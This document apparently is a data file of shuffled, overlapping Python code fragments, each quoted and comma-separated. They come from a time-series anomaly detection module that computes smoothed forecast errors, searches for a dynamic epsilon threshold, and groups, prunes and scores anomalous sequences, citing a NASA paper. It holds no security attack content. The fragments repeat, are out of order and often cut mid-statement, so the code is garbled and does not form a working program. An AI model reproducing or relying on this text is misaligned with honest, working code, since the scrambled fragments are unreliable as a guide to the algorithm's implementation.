"error_buffer ) # get anomalies from inverse of smoothed errors # This was",
"error_buffer) inv_anom_indices = get_anomalies( smoothed_errors_inv, window_y_true, sd_inv, i, anomalies_indices, len(y_true) ) anomalies_indices =",
"e_seq in anomaly_sequences: denominator = np.mean(smoothed_errors) + np.std(smoothed_errors) score = max([ abs(smoothed_errors[x] -",
"generate sequences above_epsilon = sorted(list(set(above_epsilon))) groups = [list(group) for group in mit.consecutive_groups(above_epsilon)] above_sequences",
"(i + j) < len(smoothed_errors) and (i + j) not in anomaly_indices: if",
"smoothed_errors[i] # group anomalies into continuous sequences anomaly_indices = sorted(list(set(anomaly_indices))) groups = [list(group)",
"error residuals. Smoothed if specified by user. \"\"\" errors = [abs(y_h - y_t)",
"= max([ abs(smoothed_errors[x] - epsilon) / denominator for x in range(e_seq[0], e_seq[1]) ])",
"== g[-1]] mean_perc_decrease = (mu - np.mean(below_epsilon)) / mu sd_perc_decrease = (sigma -",
"[] for i in range(len(smoothed_errors)): e = smoothed_errors[i] if e < epsilon: #",
"of data. If smoothed errors desired, runs EWMA. Args: y_hat (list): forecasted values.",
"smoothed_errors[error_seq[0]:error_seq[1]] e_seq_max.append(max(sliced_errors)) smoothed_errors_max.append(max(sliced_errors)) smoothed_errors_max.sort(reverse=True) if max_error_below_e > 0: smoothed_errors_max.append(max_error_below_e) indices_remove = [] for",
"epsilon errors_seq, anomaly_indices, max_error_below_e = group_consecutive_anomalies( smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies )",
"numpy as np # Methods to do dynamic error thresholding on timeseries data",
"(int): smoothing_percent (float): smoothed (bool): whether the returned errors should be smoothed with",
"epsilon return max_epsilon, sd_threshold def get_anomalies(smoothed_errors, y_true, z, window, all_anomalies, error_buffer): \"\"\" Helper",
"NASA paper but # wasn't referenced in the paper # we get the",
"anomaly_sequences = [(g[0], g[-1]) for g in anomalies_groups if not g[0] == g[-1]]",
"denominator = np.mean(smoothed_errors) + np.std(smoothed_errors) score = max([ abs(smoothed_errors[x] - epsilon) / denominator",
"np.arange(2.5, sd_limit, 0.5): epsilon = mu + (sigma * z) below_epsilon, below_indices, above_epsilon",
"<= 0.05 * accepted_range: # not an anomaly continue for j in range(error_buffer):",
"i == num_windows + 1: curr_index = len(y_true) window_smoothed_errors = smoothed_errors[prev_index:curr_index] window_y_true =",
"anomaly_indices, max_error_below_e = group_consecutive_anomalies( smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies ) if len(errors_seq)",
"anomalies from inverse of smoothed errors # This was done in the implementation",
"import numpy as np # Methods to do dynamic error thresholding on timeseries",
"sd_limit, 0.5): epsilon = mu + (sigma * z) below_epsilon, below_indices, above_epsilon =",
"# The treshold is determined dynamically by testing multiple Zs. # z is",
"= [] for i in range(len(smoothed_errors_max)): if i < len(smoothed_errors_max) - 1: delta",
"for each sequence anomalies_scores = [] for e_seq in anomaly_sequences: denominator = np.mean(smoothed_errors)",
"e = smoothed_errors[i] if e < epsilon: # save to compute delta mean",
"true values. len(y_hat)==len(y_true). window_size (int): batch_size (int): smoothing_percent (float): smoothed (bool): whether the",
"i < len(smoothed_errors_max) - 1: delta = smoothed_errors_max[i] - smoothed_errors_max[i + 1] perc_change",
"group in mit.consecutive_groups(anomaly_indices)] e_seq = [(g[0], g[-1]) for g in groups if g[0]",
"in window_smoothed_errors] epsilon_inv, sd_inv = compute_threshold(smoothed_errors_inv, error_buffer) inv_anom_indices = get_anomalies( smoothed_errors_inv, window_y_true, sd_inv,",
"method to get anomalies. \"\"\" mu = np.mean(smoothed_errors) sigma = np.std(smoothed_errors) epsilon =",
"the paper # we get the inverse by flipping around the mean mu",
"i in range(len(smoothed_errors_max)): if i < len(smoothed_errors_max) - 1: delta = smoothed_errors_max[i] -",
"= np.mean(smoothed_errors) + np.std(smoothed_errors) score = max([ abs(smoothed_errors[x] - epsilon) / denominator for",
"smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies ) if len(errors_seq) > 0: anomaly_indices =",
"Args: y_hat (list): forecasted values. len(y_hat)==len(y_true). y_true (list): true values. len(y_hat)==len(y_true). window_size (int):",
"window_smoothed_errors] epsilon_inv, sd_inv = compute_threshold(smoothed_errors_inv, error_buffer) inv_anom_indices = get_anomalies( smoothed_errors_inv, window_y_true, sd_inv, i,",
"# z is drawn from an ordered set of positive values representing the",
"# number of standard deviations above mean(smoothed_errors) # here we iterate in increments",
"iterate in increments of 0.5 on the range that the NASA paper found",
"= sorted(list(set(above_epsilon))) groups = [list(group) for group in mit.consecutive_groups(above_epsilon)] above_sequences = [(g[0], g[-1])",
"errors historical_error_window = int(window_size * batch_size * smoothing_percent) moving_avg = [] for i",
"z is drawn from an ordered set of positive values representing the #",
"window_size (int): batch_size (int): error_buffer (int): Returns: \"\"\" if len(y_true) <= batch_size *",
"(int): batch_size (int): error_buffer (int): Returns: \"\"\" if len(y_true) <= batch_size * window_size:",
"j) not in anomaly_indices: if (i + j) > minimum_index: anomaly_indices.append(i + j)",
"> minimum_index: anomaly_indices.append(i + j) if (i - j) < len(smoothed_errors) and (i",
"i * batch_size curr_index = (window_size * batch_size) + (i * batch_size) if",
"batch_size) + (i * batch_size) if i == num_windows + 1: curr_index =",
"g in groups if not g[0] == g[-1]] mean_perc_decrease = (mu - np.mean(below_epsilon))",
"+ historical_error_window + 1 if left_window < 0: left_window = 0 if right_window",
"mu + (z * sigma) # compare to epsilon errors_seq, anomaly_indices, max_error_below_e =",
"= get_anomalies( window_smoothed_errors, window_y_true, sd_threshold, i, anomalies_indices, error_buffer ) # get anomalies from",
"from epsilon for each sequence anomalies_scores = [] for e_seq in anomaly_sequences: denominator",
"<= epsilon or smoothed_errors[i] <= 0.05 * accepted_range: # not an anomaly continue",
"anomaly_indices.append(i - j) # get all the errors that are below epsilon and",
"smoothed (bool): whether the returned errors should be smoothed with EWMA. Returns: (list):",
"left_window = i - historical_error_window right_window = i + historical_error_window + 1 if",
"return moving_avg def extract_anomalies(y_true, smoothed_errors, window_size, batch_size, error_buffer): \"\"\" Extracts anomalies from the",
"for i_a in window_anom_indices]) # group anomalies anomalies_indices = sorted(list(set(anomalies_indices))) anomalies_groups = [list(group)",
"of positive values representing the # number of standard deviations above mean(smoothed_errors) #",
"index in sorted(indices_remove, reverse=True): del e_seq[index] pruned_indices = [] for i in anomaly_indices:",
"= i - historical_error_window right_window = i + historical_error_window + 1 if left_window",
"for index in sorted(indices_remove, reverse=True): del e_seq[index] pruned_indices = [] for i in",
"by testing multiple Zs. # z is drawn from an ordered set of",
"for i in range(len(errors)): left_window = i - historical_error_window right_window = i +",
"error_buffer, window, all_anomalies ) if len(errors_seq) > 0: anomaly_indices = prune_anomalies( errors_seq, smoothed_errors,",
"y_true, window_size=5, batch_size=30, smoothing_percent=0.05, smoothed=True): \"\"\" Calculates the forecasting error for two arrays",
"not in above_epsilon and (i + j) < len(smoothed_errors): above_epsilon.append(i + j) if",
"get anomalies from inverse of smoothed errors # This was done in the",
"int((len(y_true) - (batch_size * window_size)) / batch_size) anomalies_indices = [] for i in",
"prune_anomalies( errors_seq, smoothed_errors, max_error_below_e, anomaly_indices ) return anomaly_indices def group_consecutive_anomalies(smoothed_errors, epsilon, y_true, error_buffer,",
"(i - j) < len(smoothed_errors) and (i - j) not in anomaly_indices: if",
"above_epsilon = [], [], [] for i in range(len(smoothed_errors)): e = smoothed_errors[i] if",
"* window_size)) / batch_size) anomalies_indices = [] for i in range(num_windows + 1):",
"for epsilon calculation below_epsilon.append(e) below_indices.append(i) if e > epsilon: # above_epsilon values are",
"largest epsilon we've seen so far if epsilon > max_epsilon: sd_threshold = z",
"anomaly_indices = prune_anomalies( errors_seq, smoothed_errors, max_error_below_e, anomaly_indices ) return anomaly_indices def group_consecutive_anomalies(smoothed_errors, epsilon,",
"in range(len(errors)): left_window = i - historical_error_window right_window = i + historical_error_window +",
"Zs. # z is drawn from an ordered set of positive values representing",
"+ 1: curr_index = len(y_true) window_smoothed_errors = smoothed_errors[prev_index:curr_index] window_y_true = y_true[prev_index:curr_index] epsilon, sd_threshold",
"mean mu = np.mean(window_smoothed_errors) smoothed_errors_inv = [mu + (mu - e) for e",
"y_hat (list): forecasted values. len(y_hat)==len(y_true). y_true (list): true values. len(y_hat)==len(y_true). window_size (int): batch_size",
") # get anomalies from inverse of smoothed errors # This was done",
"in the paper # we get the inverse by flipping around the mean",
"an anomaly continue for j in range(error_buffer): if (i + j) < len(smoothed_errors)",
"z in np.arange(2.5, sd_limit, 0.5): epsilon = mu + (sigma * z) below_epsilon,",
"/ mu sd_perc_decrease = (sigma - np.std(below_epsilon)) / sigma epsilon = (mean_perc_decrease +",
"all_anomalies: if i not in anomaly_indices: max_error_below_e = smoothed_errors[i] # group anomalies into",
"= smoothed_errors[i] # group anomalies into continuous sequences anomaly_indices = sorted(list(set(anomaly_indices))) groups =",
"accepted perc decrease btwn max errors in anomalous sequences MIN_PERCENT_DECREASE = 0.05 e_seq_max,",
"inspired by: https://arxiv.org/pdf/1802.04431.pdf def get_forecast_errors(y_hat, y_true, window_size=5, batch_size=30, smoothing_percent=0.05, smoothed=True): \"\"\" Calculates the",
"to process them for i in range(len(smoothed_errors)): adjusted_index = i + (window -",
"here we iterate in increments of 0.5 on the range that the NASA",
"\"\"\" if len(y_true) <= batch_size * window_size: raise ValueError(\"Window size (%s) larger than",
"MIN_PERCENT_DECREASE = 0.05 e_seq_max, smoothed_errors_max = [], [] for error_seq in e_seq: if",
"MIN_PERCENT_DECREASE: indices_remove.append(e_seq_max.index(smoothed_errors_max[i])) for index in sorted(indices_remove, reverse=True): del e_seq[index] pruned_indices = [] for",
") anomalies_indices = list(set(anomalies_indices + inv_anom_indices)) anomalies_indices.extend([i_a + i * batch_size for i_a",
"smoothed_errors_max = [], [] for error_seq in e_seq: if len(smoothed_errors[error_seq[0]:error_seq[1]]) > 0: sliced_errors",
"max_error_below_e def prune_anomalies(e_seq, smoothed_errors, max_error_below_e, anomaly_indices): \"\"\" Helper method that removes anomalies which",
"anomalies until model is trained enough anomaly_indices = [] max_error_below_e = 0 for",
"found to be good for z in np.arange(2.5, sd_limit, 0.5): epsilon = mu",
"range(0, error_buffer): if (i + j) not in above_epsilon and (i + j)",
"# generate sequences above_epsilon = sorted(list(set(above_epsilon))) groups = [list(group) for group in mit.consecutive_groups(above_epsilon)]",
"/ denominator for x in range(e_seq[0], e_seq[1]) ]) anomalies_scores.append(score) return anomaly_sequences, anomalies_scores def",
"errors_seq, smoothed_errors, max_error_below_e, anomaly_indices ) return anomaly_indices def group_consecutive_anomalies(smoothed_errors, epsilon, y_true, error_buffer, window,",
"sequences anomaly_indices = sorted(list(set(anomaly_indices))) groups = [list(group) for group in mit.consecutive_groups(anomaly_indices)] e_seq =",
"not in anomaly_indices: if (i + j) > minimum_index: anomaly_indices.append(i + j) if",
"anomalies to process them for i in range(len(smoothed_errors)): adjusted_index = i + (window",
"by user. \"\"\" errors = [abs(y_h - y_t) for y_h, y_t in zip(y_hat,",
"np.std(smoothed_errors) max_epsilon = 0 sd_threshold = sd_limit # The treshold is determined dynamically",
"is drawn from an ordered set of positive values representing the # number",
"window_size (int): batch_size (int): smoothing_percent (float): smoothed (bool): whether the returned errors should",
"+ sd_perc_decrease) /\\ (len(above_sequences)**2 + len(above_epsilon)) # update the largest epsilon we've seen",
"smoothing_percent (float): smoothed (bool): whether the returned errors should be smoothed with EWMA.",
"anomalies anomalies_indices = sorted(list(set(anomalies_indices))) anomalies_groups = [list(group) for group in mit.consecutive_groups(anomalies_indices)] anomaly_sequences =",
"(window - 1) * batch_size if smoothed_errors[i] > max_error_below_e and adjusted_index not in",
"window_size=5, batch_size=30, smoothing_percent=0.05, smoothed=True): \"\"\" Calculates the forecasting error for two arrays of",
"and (i + j) < len(smoothed_errors): above_epsilon.append(i + j) if (i - j)",
"(len(above_sequences)**2 + len(above_epsilon)) # update the largest epsilon we've seen so far if",
"anomalies_scores = [] for e_seq in anomaly_sequences: denominator = np.mean(smoothed_errors) + np.std(smoothed_errors) score",
"np.mean(smoothed_errors) + np.std(smoothed_errors) score = max([ abs(smoothed_errors[x] - epsilon) / denominator for x",
"epsilon: # above_epsilon values are anomalies for j in range(0, error_buffer): if (i",
"- j) < len(smoothed_errors) and (i - j) not in anomaly_indices: if (i",
"This was done in the implementation of NASA paper but # wasn't referenced",
"return max_epsilon, sd_threshold def get_anomalies(smoothed_errors, y_true, z, window, all_anomalies, error_buffer): \"\"\" Helper method",
"sorted(list(set(above_epsilon))) groups = [list(group) for group in mit.consecutive_groups(above_epsilon)] above_sequences = [(g[0], g[-1]) for",
"= delta / smoothed_errors_max[i] if perc_change < MIN_PERCENT_DECREASE: indices_remove.append(e_seq_max.index(smoothed_errors_max[i])) for index in sorted(indices_remove,",
"* batch_size * smoothing_percent) moving_avg = [] for i in range(len(errors)): left_window =",
"range that the NASA paper found to be good for z in np.arange(2.5,",
"errors in anomalous sequences MIN_PERCENT_DECREASE = 0.05 e_seq_max, smoothed_errors_max = [], [] for",
"should be smoothed with EWMA. Returns: (list): error residuals. Smoothed if specified by",
"all_anomalies ) if len(errors_seq) > 0: anomaly_indices = prune_anomalies( errors_seq, smoothed_errors, max_error_below_e, anomaly_indices",
"<= batch_size * window_size: raise ValueError(\"Window size (%s) larger than y_true (len=%s).\" %",
"we iterate in increments of 0.5 on the range that the NASA paper",
"prev_index = i * batch_size curr_index = (window_size * batch_size) + (i *",
"return anomaly_sequences, anomalies_scores def compute_threshold(smoothed_errors, error_buffer, sd_limit=12.0): \"\"\"Helper method for `extract_anomalies` method. Calculates",
"sd_threshold can be multiplied by sigma to get epsilon return max_epsilon, sd_threshold def",
"all the errors that are below epsilon and which # weren't identified as",
"curr_index = len(y_true) window_smoothed_errors = smoothed_errors[prev_index:curr_index] window_y_true = y_true[prev_index:curr_index] epsilon, sd_threshold = compute_threshold(window_smoothed_errors,",
"don't meet a minimum separation from next anomaly. \"\"\" # min accepted perc",
"reverse=True): del e_seq[index] pruned_indices = [] for i in anomaly_indices: for error_seq in",
"a cutoff value for anomalies until model is trained enough anomaly_indices = []",
"= 0 if right_window > len(errors): right_window = len(errors) moving_avg.append(np.mean(errors[left_window:right_window])) return moving_avg def",
"runs EWMA. Args: y_hat (list): forecasted values. len(y_hat)==len(y_true). y_true (list): true values. len(y_hat)==len(y_true).",
"max_epsilon = epsilon # sd_threshold can be multiplied by sigma to get epsilon",
"smoothed_errors[i] <= epsilon or smoothed_errors[i] <= 0.05 * accepted_range: # not an anomaly",
"= i + historical_error_window + 1 if left_window < 0: left_window = 0",
"batch_size (int): error_buffer (int): Returns: \"\"\" if len(y_true) <= batch_size * window_size: raise",
"- j) > minimum_index: anomaly_indices.append(i - j) # get all the errors that",
"btwn max errors in anomalous sequences MIN_PERCENT_DECREASE = 0.05 e_seq_max, smoothed_errors_max = [],",
"for z in np.arange(2.5, sd_limit, 0.5): epsilon = mu + (sigma * z)",
"list(set(anomalies_indices + inv_anom_indices)) anomalies_indices.extend([i_a + i * batch_size for i_a in window_anom_indices]) #",
"if (i + j) < len(smoothed_errors) and (i + j) not in anomaly_indices:",
"if not g[0] == g[-1]] mean_perc_decrease = (mu - np.mean(below_epsilon)) / mu sd_perc_decrease",
"/ batch_size) anomalies_indices = [] for i in range(num_windows + 1): prev_index =",
"all_anomalies, error_buffer): \"\"\" Helper method to get anomalies. \"\"\" mu = np.mean(smoothed_errors) sigma",
"= np.mean(window_smoothed_errors) smoothed_errors_inv = [mu + (mu - e) for e in window_smoothed_errors]",
"errors that are below epsilon and which # weren't identified as anomalies to",
"in range(len(smoothed_errors)): if smoothed_errors[i] <= epsilon or smoothed_errors[i] <= 0.05 * accepted_range: #",
"if len(smoothed_errors[error_seq[0]:error_seq[1]]) > 0: sliced_errors = smoothed_errors[error_seq[0]:error_seq[1]] e_seq_max.append(max(sliced_errors)) smoothed_errors_max.append(max(sliced_errors)) smoothed_errors_max.sort(reverse=True) if max_error_below_e >",
"[], [], [] for i in range(len(smoothed_errors)): e = smoothed_errors[i] if e <",
"!= g[-1]] return e_seq, anomaly_indices, max_error_below_e def prune_anomalies(e_seq, smoothed_errors, max_error_below_e, anomaly_indices): \"\"\" Helper",
"(list): forecasted values. len(y_hat)==len(y_true). y_true (list): true values. len(y_hat)==len(y_true). window_size (int): batch_size (int):",
"smoothed_errors_inv, window_y_true, sd_inv, i, anomalies_indices, len(y_true) ) anomalies_indices = list(set(anomalies_indices + inv_anom_indices)) anomalies_indices.extend([i_a",
"= [], [], [] for i in range(len(smoothed_errors)): e = smoothed_errors[i] if e",
"window, all_anomalies, batch_size=30): upper_percentile, lower_percentile = np.percentile(y_true, [95, 5]) accepted_range = upper_percentile -",
"the implementation of NASA paper but # wasn't referenced in the paper #",
"score = max([ abs(smoothed_errors[x] - epsilon) / denominator for x in range(e_seq[0], e_seq[1])",
"< len(smoothed_errors) and (i - j) not in anomaly_indices: if (i - j)",
"epsilon we've seen so far if epsilon > max_epsilon: sd_threshold = z max_epsilon",
"- j) if len(above_epsilon) == 0: continue # generate sequences above_epsilon = sorted(list(set(above_epsilon)))",
"if (i - j) > minimum_index: anomaly_indices.append(i - j) # get all the",
"ordered set of positive values representing the # number of standard deviations above",
"the NASA paper found to be good for z in np.arange(2.5, sd_limit, 0.5):",
"adjusted_index = i + (window - 1) * batch_size if smoothed_errors[i] > max_error_below_e",
"smoothed_errors_inv = [mu + (mu - e) for e in window_smoothed_errors] epsilon_inv, sd_inv",
"0.5 on the range that the NASA paper found to be good for",
"for g in groups if g[0] != g[-1]] return e_seq, anomaly_indices, max_error_below_e def",
"= [], [] for error_seq in e_seq: if len(smoothed_errors[error_seq[0]:error_seq[1]]) > 0: sliced_errors =",
"(mu - np.mean(below_epsilon)) / mu sd_perc_decrease = (sigma - np.std(below_epsilon)) / sigma epsilon",
"= np.percentile(y_true, [95, 5]) accepted_range = upper_percentile - lower_percentile minimum_index = 100 #",
"* accepted_range: # not an anomaly continue for j in range(error_buffer): if (i",
"anomalies_indices.extend([i_a + i * batch_size for i_a in window_anom_indices]) # group anomalies anomalies_indices",
"max errors in anomalous sequences MIN_PERCENT_DECREASE = 0.05 e_seq_max, smoothed_errors_max = [], []",
"if left_window < 0: left_window = 0 if right_window > len(errors): right_window =",
"multiple Zs. # z is drawn from an ordered set of positive values",
"- e) for e in window_smoothed_errors] epsilon_inv, sd_inv = compute_threshold(smoothed_errors_inv, error_buffer) inv_anom_indices =",
"have a cutoff value for anomalies until model is trained enough anomaly_indices =",
"z max_epsilon = epsilon # sd_threshold can be multiplied by sigma to get",
"for i in range(num_windows + 1): prev_index = i * batch_size curr_index =",
"groups = [list(group) for group in mit.consecutive_groups(above_epsilon)] above_sequences = [(g[0], g[-1]) for g",
"# Implementation inspired by: https://arxiv.org/pdf/1802.04431.pdf def get_forecast_errors(y_hat, y_true, window_size=5, batch_size=30, smoothing_percent=0.05, smoothed=True): \"\"\"",
"if (i - j) not in above_epsilon and (i - j) >= 0:",
"max_epsilon = 0 sd_threshold = sd_limit # The treshold is determined dynamically by",
"i_a in window_anom_indices]) # group anomalies anomalies_indices = sorted(list(set(anomalies_indices))) anomalies_groups = [list(group) for",
"the returned errors should be smoothed with EWMA. Returns: (list): error residuals. Smoothed",
"window_anom_indices]) # group anomalies anomalies_indices = sorted(list(set(anomalies_indices))) anomalies_groups = [list(group) for group in",
"accepted_range = upper_percentile - lower_percentile minimum_index = 100 # have a cutoff value",
"in range(len(smoothed_errors)): e = smoothed_errors[i] if e < epsilon: # save to compute",
"in groups if g[0] != g[-1]] return e_seq, anomaly_indices, max_error_below_e def prune_anomalies(e_seq, smoothed_errors,",
"i - historical_error_window right_window = i + historical_error_window + 1 if left_window <",
"i in range(num_windows + 1): prev_index = i * batch_size curr_index = (window_size",
"if i == num_windows + 1: curr_index = len(y_true) window_smoothed_errors = smoothed_errors[prev_index:curr_index] window_y_true",
"del e_seq[index] pruned_indices = [] for i in anomaly_indices: for error_seq in e_seq:",
"error_seq in e_seq: if i >= error_seq[0] and i <= error_seq[1]: pruned_indices.append(i) return",
"i * batch_size for i_a in window_anom_indices]) # group anomalies anomalies_indices = sorted(list(set(anomalies_indices)))",
"e_seq_max, smoothed_errors_max = [], [] for error_seq in e_seq: if len(smoothed_errors[error_seq[0]:error_seq[1]]) > 0:",
"y_true)] if not smoothed: return errors historical_error_window = int(window_size * batch_size * smoothing_percent)",
"window_y_true, sd_inv, i, anomalies_indices, len(y_true) ) anomalies_indices = list(set(anomalies_indices + inv_anom_indices)) anomalies_indices.extend([i_a +",
"for anomalies based on the max distance from epsilon for each sequence anomalies_scores",
"errors. Args: y_true (): smoothed_errors (): window_size (int): batch_size (int): error_buffer (int): Returns:",
"above mean(smoothed_errors) # here we iterate in increments of 0.5 on the range",
"window, all_anomalies, error_buffer): \"\"\" Helper method to get anomalies. \"\"\" mu = np.mean(smoothed_errors)",
"i in range(len(errors)): left_window = i - historical_error_window right_window = i + historical_error_window",
"adjusted_index not in all_anomalies: if i not in anomaly_indices: max_error_below_e = smoothed_errors[i] #",
"smoothing_percent=0.05, smoothed=True): \"\"\" Calculates the forecasting error for two arrays of data. If",
"sd_inv, i, anomalies_indices, len(y_true) ) anomalies_indices = list(set(anomalies_indices + inv_anom_indices)) anomalies_indices.extend([i_a + i",
"# weren't identified as anomalies to process them for i in range(len(smoothed_errors)): adjusted_index",
"if max_error_below_e > 0: smoothed_errors_max.append(max_error_below_e) indices_remove = [] for i in range(len(smoothed_errors_max)): if",
"treshold is determined dynamically by testing multiple Zs. # z is drawn from",
"get anomalies. \"\"\" mu = np.mean(smoothed_errors) sigma = np.std(smoothed_errors) epsilon = mu +",
"be smoothed with EWMA. Returns: (list): error residuals. Smoothed if specified by user.",
"implementation of NASA paper but # wasn't referenced in the paper # we",
"int(window_size * batch_size * smoothing_percent) moving_avg = [] for i in range(len(errors)): left_window",
"0.05 e_seq_max, smoothed_errors_max = [], [] for error_seq in e_seq: if len(smoothed_errors[error_seq[0]:error_seq[1]]) >",
"+ j) > minimum_index: anomaly_indices.append(i + j) if (i - j) < len(smoothed_errors)",
"error_buffer): if (i + j) not in above_epsilon and (i + j) <",
"anomaly_indices): \"\"\" Helper method that removes anomalies which don't meet a minimum separation",
"if g[0] != g[-1]] return e_seq, anomaly_indices, max_error_below_e def prune_anomalies(e_seq, smoothed_errors, max_error_below_e, anomaly_indices):",
"by sigma to get epsilon return max_epsilon, sd_threshold def get_anomalies(smoothed_errors, y_true, z, window,",
"batch_size curr_index = (window_size * batch_size) + (i * batch_size) if i ==",
"* batch_size if smoothed_errors[i] > max_error_below_e and adjusted_index not in all_anomalies: if i",
"(int): error_buffer (int): Returns: \"\"\" if len(y_true) <= batch_size * window_size: raise ValueError(\"Window",
"j) not in above_epsilon and (i + j) < len(smoothed_errors): above_epsilon.append(i + j)",
"len(smoothed_errors) and (i - j) not in anomaly_indices: if (i - j) >",
"sd_limit # The treshold is determined dynamically by testing multiple Zs. # z",
"as mit import numpy as np # Methods to do dynamic error thresholding",
"batch_size for i_a in window_anom_indices]) # group anomalies anomalies_indices = sorted(list(set(anomalies_indices))) anomalies_groups =",
"> max_epsilon: sd_threshold = z max_epsilon = epsilon # sd_threshold can be multiplied",
"value for anomalies until model is trained enough anomaly_indices = [] max_error_below_e =",
"window_size, batch_size, error_buffer): \"\"\" Extracts anomalies from the errors. Args: y_true (): smoothed_errors",
"# wasn't referenced in the paper # we get the inverse by flipping",
"range(len(errors)): left_window = i - historical_error_window right_window = i + historical_error_window + 1",
"(batch_size * window_size)) / batch_size) anomalies_indices = [] for i in range(num_windows +",
"below_indices, above_epsilon = [], [], [] for i in range(len(smoothed_errors)): e = smoothed_errors[i]",
"g[-1]) for g in anomalies_groups if not g[0] == g[-1]] # generate \"scores\"",
"min accepted perc decrease btwn max errors in anomalous sequences MIN_PERCENT_DECREASE = 0.05",
"anomalies_indices = sorted(list(set(anomalies_indices))) anomalies_groups = [list(group) for group in mit.consecutive_groups(anomalies_indices)] anomaly_sequences = [(g[0],",
"anomalies_groups if not g[0] == g[-1]] # generate \"scores\" for anomalies based on",
"for y_h, y_t in zip(y_hat, y_true)] if not smoothed: return errors historical_error_window =",
"smoothed with EWMA. Returns: (list): error residuals. Smoothed if specified by user. \"\"\"",
"1): prev_index = i * batch_size curr_index = (window_size * batch_size) + (i",
"epsilon = mu + (sigma * z) below_epsilon, below_indices, above_epsilon = [], [],",
"epsilon (threshold) for anomalies. \"\"\" mu = np.mean(smoothed_errors) sigma = np.std(smoothed_errors) max_epsilon =",
"get epsilon return max_epsilon, sd_threshold def get_anomalies(smoothed_errors, y_true, z, window, all_anomalies, error_buffer): \"\"\"",
"= [list(group) for group in mit.consecutive_groups(anomaly_indices)] e_seq = [(g[0], g[-1]) for g in",
"for i in range(len(smoothed_errors_max)): if i < len(smoothed_errors_max) - 1: delta = smoothed_errors_max[i]",
"g in anomalies_groups if not g[0] == g[-1]] # generate \"scores\" for anomalies",
"j) < len(smoothed_errors): above_epsilon.append(i + j) if (i - j) not in above_epsilon",
"g[-1]] return e_seq, anomaly_indices, max_error_below_e def prune_anomalies(e_seq, smoothed_errors, max_error_below_e, anomaly_indices): \"\"\" Helper method",
"if (i - j) < len(smoothed_errors) and (i - j) not in anomaly_indices:",
"+ (window - 1) * batch_size if smoothed_errors[i] > max_error_below_e and adjusted_index not",
"(mu - e) for e in window_smoothed_errors] epsilon_inv, sd_inv = compute_threshold(smoothed_errors_inv, error_buffer) inv_anom_indices",
"`extract_anomalies` method. Calculates the epsilon (threshold) for anomalies. \"\"\" mu = np.mean(smoothed_errors) sigma",
"be good for z in np.arange(2.5, sd_limit, 0.5): epsilon = mu + (sigma",
"errors_seq, anomaly_indices, max_error_below_e = group_consecutive_anomalies( smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies ) if",
"g[0] == g[-1]] # generate \"scores\" for anomalies based on the max distance",
"= y_true[prev_index:curr_index] epsilon, sd_threshold = compute_threshold(window_smoothed_errors, error_buffer) window_anom_indices = get_anomalies( window_smoothed_errors, window_y_true, sd_threshold,",
"len(y_true) ) anomalies_indices = list(set(anomalies_indices + inv_anom_indices)) anomalies_indices.extend([i_a + i * batch_size for",
"if len(y_true) <= batch_size * window_size: raise ValueError(\"Window size (%s) larger than y_true",
"(sigma - np.std(below_epsilon)) / sigma epsilon = (mean_perc_decrease + sd_perc_decrease) /\\ (len(above_sequences)**2 +",
"perc_change < MIN_PERCENT_DECREASE: indices_remove.append(e_seq_max.index(smoothed_errors_max[i])) for index in sorted(indices_remove, reverse=True): del e_seq[index] pruned_indices =",
"distance from epsilon for each sequence anomalies_scores = [] for e_seq in anomaly_sequences:",
"+ j) if (i - j) < len(smoothed_errors) and (i - j) not",
"left_window < 0: left_window = 0 if right_window > len(errors): right_window = len(errors)",
"inverse by flipping around the mean mu = np.mean(window_smoothed_errors) smoothed_errors_inv = [mu +",
"= smoothed_errors[error_seq[0]:error_seq[1]] e_seq_max.append(max(sliced_errors)) smoothed_errors_max.append(max(sliced_errors)) smoothed_errors_max.sort(reverse=True) if max_error_below_e > 0: smoothed_errors_max.append(max_error_below_e) indices_remove = []",
"Returns: \"\"\" if len(y_true) <= batch_size * window_size: raise ValueError(\"Window size (%s) larger",
"get_forecast_errors(y_hat, y_true, window_size=5, batch_size=30, smoothing_percent=0.05, smoothed=True): \"\"\" Calculates the forecasting error for two",
"sd_threshold = sd_limit # The treshold is determined dynamically by testing multiple Zs.",
"can be multiplied by sigma to get epsilon return max_epsilon, sd_threshold def get_anomalies(smoothed_errors,",
"= 0 sd_threshold = sd_limit # The treshold is determined dynamically by testing",
"continue # generate sequences above_epsilon = sorted(list(set(above_epsilon))) groups = [list(group) for group in",
"j) < len(smoothed_errors) and (i - j) not in anomaly_indices: if (i -",
"\"\"\" # min accepted perc decrease btwn max errors in anomalous sequences MIN_PERCENT_DECREASE",
"anomalies_groups = [list(group) for group in mit.consecutive_groups(anomalies_indices)] anomaly_sequences = [(g[0], g[-1]) for g",
"batch_size, error_buffer): \"\"\" Extracts anomalies from the errors. Args: y_true (): smoothed_errors ():",
"\"\"\" mu = np.mean(smoothed_errors) sigma = np.std(smoothed_errors) max_epsilon = 0 sd_threshold = sd_limit",
"(i + j) not in above_epsilon and (i + j) < len(smoothed_errors): above_epsilon.append(i",
"- j) # get all the errors that are below epsilon and which",
"+ j) not in anomaly_indices: if (i + j) > minimum_index: anomaly_indices.append(i +",
"error thresholding on timeseries data # Implementation inspired by: https://arxiv.org/pdf/1802.04431.pdf def get_forecast_errors(y_hat, y_true,",
"(batch_size, len(y_true))) num_windows = int((len(y_true) - (batch_size * window_size)) / batch_size) anomalies_indices =",
"= smoothed_errors[prev_index:curr_index] window_y_true = y_true[prev_index:curr_index] epsilon, sd_threshold = compute_threshold(window_smoothed_errors, error_buffer) window_anom_indices = get_anomalies(",
"that are below epsilon and which # weren't identified as anomalies to process",
"representing the # number of standard deviations above mean(smoothed_errors) # here we iterate",
"= np.std(smoothed_errors) max_epsilon = 0 sd_threshold = sd_limit # The treshold is determined",
"far if epsilon > max_epsilon: sd_threshold = z max_epsilon = epsilon # sd_threshold",
"# not an anomaly continue for j in range(error_buffer): if (i + j)",
"in anomalous sequences MIN_PERCENT_DECREASE = 0.05 e_seq_max, smoothed_errors_max = [], [] for error_seq",
"anomalies_indices = [] for i in range(num_windows + 1): prev_index = i *",
"= [list(group) for group in mit.consecutive_groups(above_epsilon)] above_sequences = [(g[0], g[-1]) for g in",
"j) if len(above_epsilon) == 0: continue # generate sequences above_epsilon = sorted(list(set(above_epsilon))) groups",
"if smoothed_errors[i] <= epsilon or smoothed_errors[i] <= 0.05 * accepted_range: # not an",
